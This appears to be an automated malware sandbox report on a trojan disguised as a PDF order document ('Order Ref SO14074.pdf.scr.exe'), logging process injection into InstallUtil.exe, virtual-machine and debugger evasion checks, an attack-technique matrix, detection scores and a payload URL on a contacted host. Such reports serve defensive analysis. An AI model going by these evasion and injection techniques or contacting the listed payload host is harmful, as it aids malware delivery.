              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: Order Ref SO14074.pdf.scr.exe PID: 5988, type: MEMORYSTR
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory allocated: 4C70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5250000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeWindow / User API: threadDelayed 6942Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeWindow / User API: threadDelayed 1681Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -31359464925306218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 7128Thread sleep count: 6942 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 7128Thread sleep count: 1681 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -99061s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98843s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98732s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98625s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98514s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98363s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -98235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97999s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97819s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97601s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97370s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97266s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -97047s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96828s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96719s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -96110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95985s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95860s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95735s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95610s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95485s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95360s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95235s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -95000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -94776s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -94652s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe TID: 5024Thread sleep time: -94479s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99765Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99547Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99422Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99297Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99172Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 99061Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98953Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98843Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98732Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98625Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98514Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98363Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 98235Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97999Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97819Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97601Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97370Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97266Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97156Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 97047Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96937Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96828Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96719Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96610Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96485Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96360Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96235Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 96110Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95985Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95860Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95735Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95610Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95485Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95360Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95235Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95109Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 95000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 94776Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 94652Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeThread delayed: delay time: 94479Jump to behavior
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2201347265.0000000006F40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: hPxNck1e4oQeMu7si0b
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2180049154.0000000000DB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46A000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10BF008Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeQueries volume information: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Order Ref SO14074.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              211
              Process Injection
              1
              Masquerading
              OS Credential Dumping111
              Security Software Discovery
              Remote Services11
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              1
              Scheduled Task/Job
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading
              41
              Virtualization/Sandbox Evasion
              Security Account Manager41
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook211
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture3
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets12
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Obfuscated Files or Information
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Order Ref SO14074.pdf.scr.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
              Order Ref SO14074.pdf.scr.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://www.new.eventawardsrussia.com/wp-includes/Lbvlxeqj.vdf0%Avira URL Cloudsafe
              https://www.new.eventawardsrussia.com0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.new.eventawardsrussia.com
              5.23.51.54
              truefalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                https://www.new.eventawardsrussia.com/wp-includes/Lbvlxeqj.vdffalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/mgravell/protobuf-netOrder Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                  high
                  https://github.com/mgravell/protobuf-netiOrder Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                    high
                    https://stackoverflow.com/q/14436606/23354Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002D1B000.00000004.00000800.00020000.00000000.sdmp, Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                      high
                      https://github.com/mgravell/protobuf-netJOrder Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameOrder Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002C71000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://stackoverflow.com/q/11564914/23354;Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/2152978/23354Order Ref SO14074.pdf.scr.exe, 00000000.00000002.2204174063.0000000007140000.00000004.08000000.00040000.00000000.sdmpfalse
                              high
                              https://www.new.eventawardsrussia.comOrder Ref SO14074.pdf.scr.exe, 00000000.00000002.2182484320.0000000002C71000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              5.23.51.54
                              www.new.eventawardsrussia.comRussian Federation
                              9123TIMEWEB-ASRUfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1565087
                              Start date and time:2024-11-29 09:36:04 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 28s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Order Ref SO14074.pdf.scr.exe
                              Detection:MAL
                              Classification:mal100.evad.winEXE@4/0@1/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 241
                              • Number of non-executed functions: 36
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
